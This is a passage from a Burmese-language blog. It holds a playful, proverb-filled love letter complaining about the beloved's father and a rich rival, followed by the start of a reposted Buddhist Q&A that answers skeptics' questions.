ပန္းေလးလွေတာ့ လိပ္ျပာေတြ ဝဲတယ္တဲ့။ သိုးငယ္ေလးလို ျဖဴစင္ျပီး သမင္မ်က္လံုးမွာ ဇင္ေယာ္ေတာင္ မ်က္ခံုးေလးနဲ႕ ငါးရံ႕ကိုယ္လံုးေလးကို ပိုင္ဆိုင္ထားတဲ့ သူကေလးကို ခ်စ္မိသူထဲမွာ ကိုလဲ အပါအဝင္ေပါ့။ သူေလးမိဘေတြရဲ႕ျပည့္စံုမႈေၾကာင့္ တပါးသူေတြ ဆင္ၾကံၾကံ ဝံပုေလြေခ်ာင္း ေခ်ာင္းေနၾကေပမယ့္ ကိုကေတာ့ ရိုးသားစြာ ခ်စ္တာပါ။သူေလးရဲ႕ စြန္ရဲလို စူးရွတဲ့ အၾကည့္ေတြမွာ အၾကိမ္ၾကိမ္ က်ရံုးခဲ့သူေလ။ ေပတစ္သီး ၊ က်ီးတစ္သား လို ေပါက္ဖြား လာတဲ့ ကို႕ရဲ႕အခ်စ္ပါ။ ကိုကေတာ့ ဥစၥေခ်ာ ရုပ္ေပါ ၊ ဘဲလိုအသံ ၊ ကြၽဲလိုအသား ၊ ဇီးကြက္မ်က္လံုး ၊ လိပ္ခါးနဲ႕ ဖားဖင္ငါးပါးၾကံအင္လကၡဏာ ျပည့္စံုသူပါ။ ဒါေပမယ့္ ျခေသၤ့လုိ တည္ၾကည္ျပီး က်ားလုိ ရဲရင့္သူေနာ္။ ဘဝေပး အေျခအေနေၾကာင့္ က်ီးကန္းနဲ႕ ဗ်ိဳင္း တုႏိႈင္းလို႕ မရႏိုင္တာေၾကာင့္ ဆင္ျဖဴမ်က္ႏွာ ဆင္မဲမၾကည့္ဝ့ံ သ လိုေတာ့ ျဖစ္မိသား။ မိေခ်ာင္းမင္း ေရခင္းျပတာမဟုတ္ေပမယ့္ သူေလးေသခ်ာ စဥ္းစားဆံုးျဖတ္ပါ။ အခ်ိန္အတိုင္းအတာ တစ္ခုေရာက္ ရင္ေတာ့ ရွဥ့္လည္းေလွ်ာက္သာ ပ်ားလည္းစြဲသာ ျဖစ္မယ့္ အေျဖေလးေပးေပါ့။ အေျဖမရမခ်င္း ဝက္အစာေတာင္း သလို တက်ီက်ီ မအီမိေအာင္ က်ိဳးစားထိန္းႏိုင္ေပမယ့္ ေခြးေနရာမရသလို ေနမထိထိုင္မသာေတာ့ ျဖစ္ေနရမွာပါ။
ညည အိမ္မက္ထဲမွာေလ… သူေလးနဲ႕ကို လားၾကီးစီးလုိ႕ ကမၻာအျပင္ဘက္ကို သြားၾကတယ္တဲ့။ သူေလးအတိတ္မွာမွားခဲ့တာေတြရွိရင္ေတာင္ ကို႕ဘဝတစ္ခုလံုး ႏြားအျဖစ္ခံျပီး သားပိုက္ေကာင္လို ကို႕ရင္ခြင္ထဲမွာ သူေလးကို ထားျပီးေၾကာင္ေလးကို ယုယသလို ယုယမႈ ေလးေတြ ေပးခ်င္တယ္ကြာ။ သူေလးရဲ႕ ေမတၱာေတြနဲ႕ တုန္႕ျပန္လာမယ့္စာကေလးကို သစ္ကုလားအုပ္လုိ အေမွ်ာ္လင့္ၾကီး ေမွ်ာ္လင့္ေန မယ္ေနာ္။ ကိုေမွ်ာ္လင့္သလိုေလး ျဖစ္လာရင္ေတာ့ငါးသေလာက္ျပံဳးေလး နဲ႕ ျမင္းတစ္ေကာင္လို အေျပးေလး လာခဲ့မယ္ သူေလးရယ္….
အခ်စ္ရယ္ ဒီစာကိုေရးလိုက္လို႔ ကိုယ့္ငါးခ်ဥ္ ကိုယ္ခ်ဥ္တယ္၊ မိေက်ာင္းမင္း ေရခင္းျပတယ္၊ ခ႐ု ခါးေတာင္းက်ိဳက္ဖမ္းတယ္လို႔ မထင္ေစခ်င္ဘူးေနာ္။ ကိုယ့္မွာ မင္းကိုခ်စ္မိမွပဲ ခဲမွန္ဖူးတဲ့ စာသူငယ္လိုလို၊ မပိုင္၀က္ေမြးဆိုသ လို လို၊အိတ္ေပါက္နဲ႔ ဖားေကာက္ဆိုသလိုလို ျဖစ္ေနပါၿပီ။
အခုအခ်ိန္မွာ ၀က္ျဖစ္မွေတာ့ မစင္ေၾကာက္ေန လို႔လည္း မထူးေတာ့ပါဘူးေလ။မင္းအေဖကို ေျပာလိုက္ပါ ျမင္းကမလႈပ္ ခံုကလႈပ္၊ ယုန္ကမတိုး ပိုက္ကတိုး ျဖစ္မေနပါနဲ႔လို႔။ ယူမွာက မင္းကိုပါ။ ဘယ္ႏွယ့္သူကကဲကဲလႈပ္ေနရ တာလဲလို႔။
ၾကက္တူေ႐ြး က ေတာ္ေတာ္ မယ္ေဘာ္က ကဲမေနပါနဲ႔လို႔။ မင္းအေဖက ကိုယ့္ကိုေျပာတယ္ ငေၾကာင္ တဲ့။ မင္းဟာအလုပ္မရွိ ေၾကာင္ေရခ်ိဳးေပးေနတဲ့့ ေကာင္စားမ်ိဳးတဲ့။ ဒါေပမဲ့ေျပာလိုက္ပါ ကိုယ္ဟာ ေၾကာင္ သူေတာ္ ႂကြက္ သူခိုးမဟုတ္သလို ေတာမီးေလာင္ေတာေၾကာင္ လက္ခေမာင္းခတ္တဲ့ ေကာင္စားမ်ိဳးေတာ့ မဟုတ္ပါဘူးလို႔။ ကိုယ့္ရဲ႕ မျဖစ္စေလာက္သာရတဲ့ လစာေလးဟာ ေၾကာင္အို ႂကြက္မေလး ဆိုသလိုျဖစ္ေနေတာ့ေလ …….ေနာက္ၿပီးေတာ့ မင္းကို လာလာေၾကာင္ေနတဲ့ သေဘၤာသားဆိုတဲ့ အေကာင္ကလည္း မင္းအေဖလို လူအတြက္ ေၾကာင္ခံတြင္းပ်က္ႏွင့္ ဆက္ရက္ေတာင္ပံက်ိဳးလိုဟိုေကာင့္အတြက္က်ေတာ့ ကံေကာင္း တဲ့က်ား သြားရင္းသမင္ေတြ႕ဆိုသလိုျဖစ္ေနတာေပါ့။
သူမ်ား အေၾကာင္း လည္းမေျပာခ်င္ပါဘူးအခ်စ္ရယ္ ဒီေကာင့္မိဘက ခ်မ္းသာေတာ့ က်ားႀကီး ေျခရာႀကီး ၊ ေ႐ႊပင္နားေတာ့့ ေ႐ႊေက်းမ်ိဳးေတာ့ျဖစ္မွာေပါ့ေလ။ တကယ္ေတာ့့ သူ႔မိဘေတြဟာ ဒီယုန္ျမင္လို႔ဒီ ခ်ံဳ ထြင္၊ ႂကြက္ေသ တစ္ခု အရင္းျပဳ႐ံုေလးနဲ႔ စားရကံၾကံဳၿပီးမုတ္ဆိတ္ပ်ားစြဲ၊ ထန္းသီးေႂကြခိုက္ က်ီးနင္းခိုက္ျဖစ္လို႔၊ ၾကက္ကန္းဆန္အိုးတိုးကာယုန္ေထာင္ေၾကာင္မိ ျဖစ္သြားသူေတြပါ။ အမ်ားညီဤကိုကြ်ဲဖတ္ ဆိုသလို လုပ္ခ်င္ ရာလုပ္ေနတဲ့ ေျပာေတာ့ေၾကာင္သူေတာ္ ယိုေတာ့ ႂကြက္ေမႊး ဆိုတာသူ႔မိဘေတြေပါ့။ ဆင္သတ္ အရပ္ေ၀ၿပီးမွ ဆင္သားေရကို ဆိတ္သားေရနဲ႔ဖံုးခ်င္တာ သူတို႔အသိုင္းအ၀ိုင္းေပါ့။ ကိုယ္အထင္အႀကီးပါဘူး။ အထင္လည္း မေသးပါဘူးေနာ္။
ဒီေကာင္ကေတာ့ ကြ်ဲကူးေရပါ ဆိုတဲ့အတိုင္းသူစီးတဲ့ျမင္း အထီးမွန္း အမမွန္းေတာင္ မသိ၊ မိဘဆိုတာလည္း က်ီးဘုတ္႐ိုေသ၊ ဘုတ္က်ီး႐ိုေသတဲ့ အဆင့္ေတာင္မရွိ၊ ေခြးကေလးအေရာ၀င္ ပါးလ်က္နားလ်က္၊ က်ီးကန္းသူေကာင္းေျမႇာက္ ေခ်းေကာက္စား ဆိုတဲ့သူမ်ိဳးပါ။ ထားလိုက္ပါေလ။ ေခြး႐ူးေကာင္းစား တစ္မြန္းတည့္ပါပဲ။ အခ်ိန္တန္ေတာ့ႏြားပိန္ကန္ပါလိမ့္မယ္။
တကယ္လို႔ မင္းသာအဲဒီအေကာင္နဲ႔ညားရင္ ဆင္နားရြက္ႂကြက္တပ္၊ ႂကြက္နားရြက္၀က္တပ္ ေပးသလိုမ်ိဳး ကို႔႐ိုးကားရား ျဖစ္ေနမွာ။ မင္းအေဖကလည္းေၾကာက္ပါတယ္ဆို ေၾကာင္နဲ႔တို႔ ဆိုသလို မင္းမလိုခ်င္တာကိုပဲ စြတ္ၿပီး ငါးၾကင္းဆီနဲ႔ ငါးၾကင္းေက်ာ္ခ်င္ေနတာ။ ကိုယ္ကေတာ့ မင္းမိဘႏွစ္ပါးေၾကာင့္ ကြ်ဲႏွစ္ေကာင္ၾကားထဲက ေျမစာပင္၊ က်ားခ်င္းကိုက္ရာ သမင္းလမ္းကူးမွား ျဖစ္မယ့္ မင္းျဖစ္အင္ကိုသာေတြးေတြး ရင္ေမာၿပီး ၾကမၼာေဆာင္သားေကာင္ဆိတ္ျဖစ္ေနပါၿပီ။ တကယ္ပါအခ်စ္ရယ္ မင္းအေဖဟာ ငွက္တစ္ေကာင္ ျမားတစ္စင္း၊ ရွဥ္႔တစ္ေကာင္ျမားတစ္စင္း ဆိုတာ ကို ျမင္ပံုမရဘူး။ေၾကာင္႐ုပ္ျဖစ္ေစ ႂကြက္ေသတာလိုရင္းဆိုၿပီး စြတ္မိုက္ေနတာ။
အင္း… မေျပာခ်င္ ပါဘူးေလ …ငါးတကာယိုသည့္ေခ်းပုဇြန္ဆိတ္ ေခါင္းမွာစု လို႔ပဲေျပာေျပာ၊ ငါးခံုးမတစ္ေကာင္ေၾကာင့္ တစ္ေလွလံုးပုပ္ လို ႔ပဲေျပာေျပာ။ သူ႔မိဘေတြကလည္းဒီေကာင့္ေၾကာင့္ နာမည္ပ်က္ေနတာၾကာပါၿပီ။ တကယ္ေတာ့ အညီႇရွိ ရာ ယင္အံုဆိုသလို မင္းအေဖဆီကို ဒီေကာင္ဟာငါးပြက္ရာငါးစာခ်ဖို႔ ေရာက္လာတာပါ။ ၿပီးေတာ့ ဆင္ေကာင္ႀကီး အၿမီးက်မွတစ္ဆိုသလို၊ ငါးစိမ္းျမင္ ငါးကင္ပစ္လုပ္သြားဦးမွာ။ ေနာက္ဆံုးက်မွ ဒီေကာင့္ေၾကာင့္ လူတြင္ ပါႏြား က်ားကိုက္ဆိုတဲ့အခ်ိန္၊ က်ားေသကို အသက္သြင္းလို႔ စင္းစင္းေသပါၿပီလို႔ မင္းအေဖေအာ္ေန ဦးမွာ။ အဲလို ဖြတ္ထြက္မွ ေတာင္ပို႔မွန္းသိတဲ့အခ်ိန္မွာ က်ားေရွ႕ ေမွာက္လ်က္လဲ သလိုျဖစ္ေနမယ့္ မင္းအေဖ ရဲ႕ ကိုယ့္ေယာကၡမေလာင္းႀကီးရဲ႕ ေသခ်င္တဲ့က်ား ေတာေျပာင္းအျဖစ္ကို ကိုယ္ျမင္ေယာင္မိေနတယ္။
မင္းအေမႀကီးက်ေတာ့လည္း ဒီေကာင္နဲ႔ေပးစားခ်င္တိုင္း သမီးတစ္ေကာင္ ႏြားတစ္ေထာင္ဆိုၿပီး အရပ္ထဲမွာ လက္ပံပင္ဆက္ရက္က် သလို ပြက္ပြက္ညံေနပါေရာ။ တကယ္က်ေတာ့ ရွမ္းႀကိဳက္ႏြားေခ်ာဆိုတာ ကိုယ္ ကေတာ့ ေႁမြေႁမြျခင္းေျချမင္ၿပီးသားပါေနာ္။ အင္း… ႏြားအို ျမက္ႏုႀကိဳက္သလို မင္းအေဖႀကီးေငြႀကိဳက္ တာလည္း ႏြားငတ္ေရခ် ဆိုသလို၊ကိုယ့္အတြက္ေတာ့ အထူး အဆန္း မ ဟုတ္ေတာ့ပါဘူး။ မင္းအေဖက ဆင္သြားရင္လမ္းျဖစ္မယ္လို႔ထင္ေနတာေလ။ငါးစာသာျမင္ ငါးမွ်ားခ်ိတ္မျမင္ ဆိုသလိုမ်ိဳး ျဖစ္ေနတာေပါ့။ ဒါထက္ သမီးေခ်ာေလးအရွိန္နဲ႔ ဆင္ျဖဴေတာ္မွီၿပီး ၾကံစုပ္၊ေမ်ာက္ျပဆန္ေတာင္း လုပ္ေနတယ္လို႔လည္း မေျပာခ်င္ပါဘူး။ ႏြားေပါ့ အစံြထုတ္လုိ႔ ေျပာရင္ မင္းပါ စိတ္ဆိုးေတာ့မယ္။
အင္း… ဆင္ျဖဴ႕မ်က္ႏွာဆင္မည္းမၾကည့္၀ံ့ ဆိုသလို ကိုယ့္ရဲ႕ မိဘ Background ကလည္း သူ႕အတြက္ ဆို ႏြားပ်ိဳသန္လွ ႏြားအိုေပါင္က်ိဳး သာသာပဲရွိေတာ့့… အင္း… ယုန္အတြက္ခ်ံဳကေၾကာင့္ၾကေန ရတာေပါ့။ မင္းအေဖကေျပာတာ။ ကိုယ့္ကို ေခြးမသား တဲ့။ ေခြးၿမီးေကာက္က်ည္ေတာက္စြပ္တဲ့။ မင္းကိုလည္း မြဲခ်င္တဲ့ေခြး ျပာပံုတိုးဆို။
ဟုတ္ခ်င္လည္းဟုတ္မွာပါ ကိုယ့္အေျခအေနကလည္း လူမေလး ေခြးမခန္႔တဲ့ အျပင္၊ အရပ္က လည္း ေခြး ပစ္တဲ့တုတ္သာသာရွိေတာ့…ကိုယ္နဲ႔ေပးစားမယ့္အစားေခြးအၿမီးျဖတ္ၿပီးသာ ေပးစားမယ္တဲ့။ အဲဒါကို ဟို အေကာင္ၾကား ရင္သူ႔ကိုေခြးအၿမီးျပတ္နဲ႔ ႏိႈင္းတယ္ဆိုၿပီး စိတ္ဆိုးဦးမယ္။ တကယ္က်ေတာ့ ကိုယ္ဟာ ေခြးရူး ဖက္ကိုက္ ေခြးေကာင္းနားရြက္ျပတ္ျဖစ္သြားမ ွာ ေၾကာက္ တဲ့ေခြးျဖဴေတာမတိုး၀ံ့တဲ့သူပါ။
ကဲပါ… ေခြးေဟာင္လို႔ေတာင္ပို႔မေျပးႏိုင္ပါဘူး။ ပိုေနျမဲက်ားေနျမဲပါအခ်စ္ရယ္။ တစ္ခုေတာ့မင္းအေဖကိုေျပာခ်င္တယ္။ ေဟာင္လြန္းသည့္ေခြး လူမေလးတတ္ဘူးဆိုတာကို။
က်န္ေသးတယ္….. မင္းအေဖကပဲေျပာတာေနာ္ ကိုယ္ဟာ ေတာ္ေတာ္ႏြားက်တဲ့့ေကာင္တဲ့့။ ကိုယ္ကလည္း ဘယ္ရမလဲ၊ဒါေပမဲ့ ခင္ဗ်ားလိုငါ့စကားႏြားရ မေျပာတတ္ဘူး၊ ႏြားသိုးႀကိဳးျပတ္ မရမ္းတတ္ဘူးလို႔ ႏြားေရွ႕ ထြန္ က်ဴးျပလိုက္တာေပါ့။
အခ်စ္ရယ္ ကိုယ္ဒီစကားေတြေျပာေနရတာ က်ားလိုက္မွ တုတ္ခုတ္၊ ဆင္လိုက္မွသစ္ပင္ရွာတာ မဟုတ္ပါဘူးေနာ္။ ကိုယ့္မွာ ရွာသမွ် ပိုက္ဆံကလည္းသမင္ေမြးရင္း က်ားစားရင္း ဆိုသလိုျဖစ္၊ ကံအေၾကာင္းက မသင့္ေလေတာ့့ ေႁမြေပြး ခါးပိုက္ပိုက္မိလ်က္သားလည္းျဖစ္၊ က်ားခ်င္းကိုက္ရာ သမင္ကူမမွားဖို႔အေရး၊ ပ်ားလည္းစဲြသာ ရွဥ့္လည္းေလွ်ာက္ သာ ျဖစ္ေအာင္လုပ္ရင္း ေႁမြမေသ တုတ္မက်ိဳး Style မ်ိဳးျဖစ္သြားေတာ့၊ ဖြတ္မရ ဓါးမဆံံုး၊ ငါးမရ ေရခ်ိဳးျပန္ ႐ံံု ေလးပါ။
ကိုယ့္မွာေတာ့က်ားလည္းေၾကာက္ရ က်ားေခ်းလည္းေၾကာက္ရဆိုသလို မင္းမိဘေကာ၊ မင္းကိုပါ လန္႔ၿပီး က်ားရဲရာ ၾကမၼာ ႐ိုးသာဆိုသလိုျဖစ္ေနရပါၿပီေလ။ တကယ္တမ္းဆိုရင္ ကိုယ္ဟာျမင္းေကာင္း ခြာလိပ္ ေလး ပါကြယ္။ မင္းအေဖ ကလည္း ကိုယ္ကမင္းကိုခ်စ္ပါတယ္ေျပာတိုင္း ႀကိဳးၾကာဆို ဘာငွက္လဲ၊ က်ား ကိုက္ပါတယ္ဆို နာတာ ရွည္လား ခ်ည္း လာလာေမးေနေလတယ္။ ဆင္ေကာင္ႀကီးေတြ႕မွေတာ့ ဆင္ေျခရာ ရွာစရာ လိုေတာ့ မလားကြယ္။ ကိုယ္ကလည္း မင္းအေဖေရွ႕မွာ ကြ်ဲပါးေစာင္းတီး… အဲ…မိေက်ာင္းမင္း ေရခင္းျပေတြ ခဏခဏ မလုပ္ခ်င္ ပါ ဘူးေလ။
လူပဲအခ်စ္ရယ္စင္းလံုးေခ်ာေတာ့ ဘယ္ျပည့္စံုမလဲ။ သိၾကားမင္းေတာင္ ကြ်ဲေယာင္ေဆာင္တာ ဂ်ိဳကားတယ္ လို႔ ေျပာခံ ရေသး တာပဲ။ထားဗ်ာ။ ပံုလံုတစ္လွည့္ ငါးပ်ံ တစ္လွည့္ ဆို တဲ့ေန႕က်ရင္ေတာ့ သူသိမွာပါေလ။ ဒါမွမဟုတ္မ်ား ယာ လည္း ညက္ေစၾကက္္လည္းပန္းေစ လို႔မ်ား လုပ္ေနသလားမသိဘူးေလ။ မေျပာခ်င္ပါဘူး အခ်စ္ရယ္ လင္းတေလာက္ေတာ့ ငွက္တိုင္းလွႏိုင္ပါတယ္။ ႏြားေၾကာ့ဆိုေလ ခ်ံဳတိုးေလဆိုတာမ်ိဳးကိုယ္မလုပ္တတ္ပါဘူး။ အလကားရတဲ့ သမက္… အဲ… ႏြား သြားျဖဲၾကည့္မေနပါနဲ႔လို႔။ မေကာင္းပါဘူးေလ။ ႏံွျပည္စုတ္အေျမႇာက္နဲ႔ခ်ိန္တတ္တဲ့ မင္းမိဘေတြကို လက္တုန္႔မျပန္ခ်င္ေပမယ့့္လည္း တခါ တခါက်ရင္ အၾကံကုန္ ဂဠဳန္ဆားခ်က္လုပ္ၿပီး ႂကြက္မႏိုင္ က်ီမီး႐ိႈ႕ခ်င္႐ႈိ႕ပစ္မိေတာ့ မွာ။ ေရာ့…ပတၱျမား ေရာ့့ …နဂါး မွလုပ္တတ္တဲ့ မင္းမိဘေတြကို ဆင္လည္းဆင္အထြာႏွင့္ ပု႐ြက္ဆိတ္လည္း ပု႐ြက္ဆိတ္အထြာ နဲ႔ပါလို႔ ၾကံဳရင္ေျပာလိုက္စမ္းပါ။ ဘာပဲျဖစ္ျဖစ္ေလ မိဘဆိုတာသားသမီးကို ဆင္စီးၿပီး ျမင္းရံေစခ်င္တာ ကို ကိုယ္သိပါ တယ္။ ဒီေတာ့ ေမ်ာက္သား စားခ်င္ ေမ်ာက္မ်က္ႏွာၾကည့္ ဆိုသလိုကိုယ္နာလည္ေပးရမွာေပါ့။
တကယ္ပါ အခ်စ္ရယ္ ကိုယ့္ဘ၀ဟာ ေရတြင္းထဲက ဖားသူငယ္လို၊ ကိုယ့္အျဖစ္ဟာေပါ့ေစလိုလို႔ ေၾကာင္႐ုပ္ထိုးေဆးေၾကာင့္ေလး ဆိုသလိုျဖစ္႐ံုမက ကိုယ့္အသည္းႏွလံုးေတြဟာ မင္းနဲ႔ေ၀းမွ က်ီးကန္းေတာင္းေမွာက္၊ ငါးရံ့ျပာ လူး၊ေၾကာင္မရွိႂကြက္ထ ဆိုသလိုမ်ိဳး ျဖစ္ေနပါၿပီ။ ဒီေလာက္လွတဲ့ သမီးမ်ိဳးကို ေမြးထားတဲ့ မင္းအေဖ ကို ေျပာ လိုုက္ပါ။
အိုင္ေတြ႕လို႔မွမလူးကြ်ဲ႐ူး၊ ငါးေၾကာ္မႀကိဳက္ ေၾကာင္မိုက္ျဖစ္သြားမွာေပါ့လို႔။ ဘာပဲေျပာေျပာပါ။ မင္းမရွိတဲ့့ ကိုယ့္ဘ၀ဟာ ႏြားကြဲ က်ားကိုက္ ဆိုသလိုျဖစ္လို႔၊ မင္းဆီက ကိုယ္ေမွ်ာ္ေနတဲ့့ အခ်စ္ေတြကလည္း က်ားသနား မွ ႏြားခ်မ္းသာရမဲ့ ဘ၀မ်ိဳးျဖစ္ေနပါၿပီ။ ယံုပါ၊ ကိုယ္ဟာ မ်က္ႏွာမမ်ားတတ္သလိုလယ္ထြန္သြား ႏြားေမ့ လူစား မ်ိဳးလည္း မဟုတ္ တာအမွန္ပါ အခ်စ္ရယ္။တကယ္ပါအခ်စ္ရယ္… ကိုယ့္ရင္ထဲက အခ်စ္ေတြဟာ မင္းတုန္႔ျပန္မွ စူဠလိပ္ေရ ထဲ လႊတ္သလိုမ်ိဳး စိုင္ေကာ္လို႔ခ်ံဳေပၚေရာက္ၿပီး ေ႐ႊပင္မွာနားတဲ့ေ႐ႊေက်းေလး ျဖစ္ေတာ့မွာပါ။
ခ်စ္သူ . . . .ငါမင္းကိုခ်စ္တာ မာသာထရီဇာ လို မာယာပလီပလာ ေတြမပါ ပါဘူး . . .မယံုရင္က်န္ေက်ာင္း လို မွန္ေျပာင္းသံုးပီး ၾကည့္လိုက္စမ္းပါ။ (ႏွလံုးသားထဲကိုပါ)မင္းကိုခ်စ္တဲ့သူေတြမ်ားထဲ ဂ်ဴလိယက္ဆီဇာ လို အလုအယက္ဆီးပါ လို႕မေျပာပါနဲ႕ပါးႀကီးမွာေမြးလို႕ မာနႀကီးတက္လို႕ပါ။တကယ္ဆိုငါဟာမင္းကို ဘင္လာဒင္လာ ဒင္လို ၾကင္နာျခင္တဲ့သူပါ ရယ္ ။မင္းေဘးမွာ အျမဲတမ္း ဒိုင္ယာနာ လို ထိုင္ကာသာ ေနလိုက္ျခင္ပါရဲ႕ . . .အဲ့ဒီအခါၾကရင္ ေဂ်ာ့ဘြတ္(ရ္) လို ေလာကြတ္ေလးလိုေတာ့လုပ္ပါ . .အာရာဖတ္လို ဘာလာကတ္ေနတာလဲ လို႕ ေအာ္မထုတ္လိုက္ပါနဲ႕ေနာ္ . ..စိတ္ႀကီးတဲ့ေနရာမွာ ထိပ္သီးမိုလို႕ပါ။
မဟုတ္ရင္ ေပါင္ခ်ိန္ကို ေျဗာင္လိန္တာထက္ ဆိုးသြားလိမ့္မယ္။တကယ္ေတာ့ ငါဟာအို၀င္ လို အပ်ိဳျမင္တိုင္းငမ္းေနသူ မဟုတ္ပါဘူးကြယ္။မင္းကိုရမယ္ဆိုရင္ေလ ေကာလင္းပါ၀လ္ လို ေတာတြင္းေတာင္ထဲမွာေနၿပီးထယ္ေစာက္လို လယ္ေပါက္ေကၽြးဆိုလဲ ေကၽြးပါမယ္။မင္းအတြက္ Prado ၀ယ္မေပးႏိုင္ေပမဲ့ ဆရာခိုေတာ့၀ယ္လိမ္းေပးႏိုင္ပါတယ္ ။ကြန္ဒိုမွာမထားႏိုင္ေပမဲ့ သြန္ဆိုသြန္ထားႏိုင္ပါတယ္။(ေရအိုး)မင္းကသာ ထြာ၀ူခ်န္း လို သြားယူစမ္းဆိုရင္ေလ ကိုေရႊထူးလို ေျမေတြတူးလို႕ႏိုက္ရဲပါတယ္ ။ (လိပ္ဥ)ဒါေတြကို ဆန္ဖရန္စကို လို အႀကံအဖန္ေတြပိုတယ္လို႕မထင္ပါနဲ႕ေနာ္။လန္ဒန္ လို အမွန္အကန္ပဲဆိုတာ ယံုၾကည္ၿပီး နီကိုရဲ လိုဒီလိုပဲလို႕ေ၀့လည္ေၾကာင္ပတ္လုပ္ပါနဲ႕ေတာ့။ကိုယ့္အခ်စ္ေတြကို ဘက္ခမ္း လို လက္ကမ္းၿပီး ႀကိဳလင့္ပါေတာ့ကြယ္ . . ဟီး ေမးထဲေရာက္လာလို႕ တင္ေပးလိုက္တယ္ ခ်စ္သူကို ရည္းစားစာေရးၿပီး ေပးတတ္ေအာင္လို႕
Saturday, September 8
Thursday, August 2
ဗုဒၶဘာသာတရားကို မယံုၾကည္လို႔ေမးေသာေမးခြန္းမ်ားကို တိက်ေသာေျဖရွင္းခ်က္...။
ဗုဒၶဘာသာကိုအဖ်က္သေဘာနဲ႔ေမးခြန္းေတြေမးလာခဲ့ရင္ျပန္လည္ေျဖႀကားနိုင္ရန္အတြက္
ဒီပိုစ့္ကိုထပ္ဆင့္မွ်ေ၀ေပးလိုက္သည္..။။
****************************
ဗုဒၶဘာသာတရားကို မယံုၾကည္လို႔ေမးေသာေမးခြန္းမ်ားကို တိက်ေသာေျဖရွင္းခ်က္...။
**********************************************************
(၁) - ဗုဒၶဘာသာဆိုတာ ဘာလဲ။
(၂) - ဒီလိုဆိုရင္ ဗုဒၶဘာသာဟာ ဒႆနပညာရပ္ တစ္ခုဘဲေပါ့။
(၃) - ဗုဒၶဆိုတာ ဘယ္သူပါလဲ။
(၄) - ဗုဒၶဟာ သူ႕ရဲ႕ၾကင္ယာေတာ္နဲ႕ သားေတာ္ကို ပစ္ထားခဲ့တဲ့အတြက္
တာ၀န္မဲ့ရာ မေရာက္ဘူးလား။
(၅) - ဗုဒၶက ပရိနိဗၺာန္ စံသြားၿပီဆိုေတာ့ သူက ကြၽႏု္ပ္တို႕ကို ဘယ္လို ကူညီႏိုင္ပါသလဲ။
(၆) - ဗုဒၶဟာ ထာ၀ရဘုရား (God) လား။
(၇) - ဗုဒၶဟာ ထာ၀ရဘုရား မဟုတ္ရင္ ဘာေၾကာင့္ သူ႕ကို လူေတြက ရွိခိုးကိုးကြယ္ေနၾကသလဲ။
(၈) - ဗုဒၶဘာသာ၀င္မ်ားဟာ ႐ုပ္တုကို ကိုးကြယ္ၾကတယ္လို႕ တခ်ိဳ႕လူမ်ားက ေျပာတာ ၾကားဘူးပါတယ္။ ဟုတ္ပါသလား။
(၉) - တ႐ုတ္ ဗုဒၶဘာသာ ဘုရားေက်ာင္းေတြ ထဲမွာ စကၠဴပိုက္ဆံေတြကို မီး႐ႈိ႕တာေတြ၊ ၿပီးေတာ့ တျခား ထူးထူးဆန္းဆန္း လုပ္ၾကတာ ေတြ႕ၾကရပါတယ္။ အဲဒါေတြကို ဘာေၾကာင့္ လုပ္ၾကပါသလဲ။
(၁၀) - ဗုဒၶဘာသာ၀င္ေတြ ကုသိုလ္ျဖစ္ လုပ္ငန္းေတြ လုပ္ၾကတာ သိပ္မၾကားမိပါဘူး။ အဲဒါ ဘာေၾကာင့္လဲ။
(၁၁) - ဘာေၾကာင့္ ဗုဒၶဘာသာေတြ အမ်ိဳးမ်ိဳး ကြဲျပားေနပါသလဲ။
(၁၂) - သင္က ဗုဒၶဘာသာကို အလြန္ အထင္ႀကီးတာပဲ။ သင္ဟာ သင့္ဘာသာတရားကို မွန္တယ္လို႕ ယူဆၿပီး တျခားဘာသာ အားလံုးကို မွားတယ္လို႕ ယူဆပံုရတယ္။
(၁၃) - ဗုဒၶဘာသာဟာ သိပၸံနည္း က်ပါသလား။
Please Click Here : For English Version
(၁) ေမး - ဗုဒၶဘာသာဆိုတာ ဘာလဲ။
ေျဖ - “ဗုဒၶဘာသာ“ ဆိုတဲ့ စကားလံုးဟာ “ဗုဒၶိ“ ဆိုတဲ့ စကားလံုးမွ လာတာပါ။ “ဗုဒၶ“ ဆိုတာ (ကိေလသာ တည္းဟူေသာ အိပ္ေပ်ာ္ျခင္းမွ) “ႏိုးလာသူ“ လို႕ အဓိပၸါယ္ရပါတယ္။ ဒါေၾကာင့္ ဗုဒၶဘာသာဆိုတာ ႏိုးၾကားေရး အေတြးအျမင္ (ဒႆန) ပညာပါပဲ။ ဒီဒႆနပညာကို ေဂါတမႏြယ္ဖြား သိဒၶတၳ မင္းသားကေန ဘုရား ျဖစ္လာတဲ့ ဗုဒၶျမတ္စြာဘုရားက စတင္ေဟာေျပာခဲ့ပါတယ္။ ဗုဒၶရွင္ေတာ္ျမတ္ဘုရားဟာ သက္ေတာ္ ၃၅ႏွစ္မွာ (ကိေလသာ တည္းဟူေသာ အိပ္ေပ်ာ္ျခင္းမွ) ႏိုးလာၿပီးလွ်င္ ဘုရားအျဖစ္သို႕ ေရာက္ေတာ္မူပါသည္။ ဗုဒၶဘာသာဟာ ႏွစ္ေပါင္း ၂၅၀၀ ေက်ာ္ ၾကာျမင့္ခဲ့ၿပီ ျဖစ္လို႕ ဗုဒၶဘာသာ၀င္ေပါင္း သန္းသံုးရာေက်ာ္ ရွိေနပါၿပီ။ လြန္ခဲ့တဲ့ ႏွစ္ေပါင္း တစ္ရာေလာက္ အထိေတာ့ ဗုဒၶဘာသာဟာ အေရွ႕တိုင္း ဒႆနပညာရပ္ တစ္ခုအျဖစ္သာ တည္ရွိခဲ့ပါတယ္။ သို႕ေသာ္လဲ ယခုအခ်ိန္မွာ ဥေရာပႏွင့္ အေမရိကတိုက္ရွိ ႏိုင္ငံေပါင္း မ်ားစြာမွာလဲ ဗုဒၶဘာသာ၀င္ ဦးေရတျဖည္းျဖည္း တိုးပြါးေနပါတယ္။
(၂) ေမး - ဒီလိုဆိုရင္ ဗုဒၶဘာသာဟာ ဒႆနပညာရပ္ တစ္ခုဘဲေပါ့။
